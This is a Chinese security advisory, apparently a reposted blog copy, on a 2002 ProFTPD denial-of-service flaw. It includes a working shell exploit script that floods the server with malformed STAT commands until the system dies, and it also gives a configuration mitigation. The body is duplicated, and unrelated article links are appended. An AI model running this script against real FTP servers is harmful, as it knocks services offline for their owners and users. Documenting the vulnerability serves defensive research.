ProFTPD STAT命令远程拒绝服务攻击漏洞
来源:互联网 发布:1024邀请码淘宝关键字 编辑:程序博客网 时间:2024/06/14 00:05
发布日期:2002-12-09
更新日期:2002-12-16
受影响系统:
BUGTRAQ ID: 6341
ProFTPD是一款开放源代码FTP服务程序。
ProFTPD不正确处理畸形STAT命令,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,使其停止响应。
攻击者如果向ProFTPD服务程序提交包含多个'/*'字符作为参数的STAT命令,会导致FTP服务崩溃,产生拒绝服务现象。
<*来源:b klein Gunnewiek (rmkleing@hio.hen.nl)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103963830009198&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
b klein Gunnewiek (rmkleing@hio.hen.nl)提供了如下测试方法:
#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach - www.duho.org
#
# use: ./prodos.sh
# do this some more to make sure the system eventually dies
cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!
#end
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在'proftpd.conf'文件中增加如下一行:
DenyFilter /*.*/
不过没有得到证实。
厂商补丁:
ProFTPD Project
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.proftpd.org/
更新日期:2002-12-16
受影响系统:
ProFTPD Project ProFTPD 1.2.7 rc3描述:
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
- Linux系统
- Unix系统
BUGTRAQ ID: 6341
ProFTPD是一款开放源代码FTP服务程序。
ProFTPD不正确处理畸形STAT命令,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,使其停止响应。
攻击者如果向ProFTPD服务程序提交包含多个'/*'字符作为参数的STAT命令,会导致FTP服务崩溃,产生拒绝服务现象。
<*来源:b klein Gunnewiek (rmkleing@hio.hen.nl)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103963830009198&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
b klein Gunnewiek (rmkleing@hio.hen.nl)提供了如下测试方法:
#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach - www.duho.org
#
# use: ./prodos.sh
# do this some more to make sure the system eventually dies
cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!
#end
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在'proftpd.conf'文件中增加如下一行:
DenyFilter /*.*/
不过没有得到证实。
厂商补丁:
ProFTPD Project
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.proftpd.org/
- ProFTPD STAT命令远程拒绝服务攻击漏洞
- Proftpd 记忆体泄漏拒绝服务攻击漏洞
- ProFTPd 远程拒绝服务漏洞 (APP,缺陷)
- OpenSSH远程PAM拒绝服务漏洞
- Apache Log4Net远程拒绝服务漏洞
- MongoDB BSON 远程拒绝服务漏洞
- MySQL数据库IF查询远程拒绝服务漏洞
- ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析
- HTTP协议Content Lenth限制漏洞导致拒绝服务攻击
- HTTP协议Content Lenth限制漏洞导致拒绝服务攻击
- [转载]HTTP协议Content Lenth限制漏洞导致拒绝服务攻击
- 拒绝服务攻击
- 拒绝服务攻击
- 拒绝服务攻击
- 拒绝服务攻击
- Microsoft IE 浏览器中Frameset远程拒绝服务漏洞
- KAME Project IPv6 IPComp头远程拒绝服务漏洞
- Microsoft Windows Vista DHCP远程拒绝服务漏洞(MS08-004)
- Proftpd服务器设置
- ORA-12546: TNS:permission denied
- 多线程TCP/IP通讯的客户端
- dataGrid导出Excel
- Linux网络服务软件安装备忘录 ver 0.3
- ProFTPD STAT命令远程拒绝服务攻击漏洞
- 多线程TCP/IP通讯的服务端
- Linux+Apache+Mysql+PHP典型配置
- 实现层的移动
- linux下挂载硬盘光驱和U盘
- Linux安装ProFTPd、MySQL以及Apache后有感
- RPM 的介绍和应用
- Linux必学的重要命令
- 反射概述,仅以此作为学习反射的开始,好像并部神秘
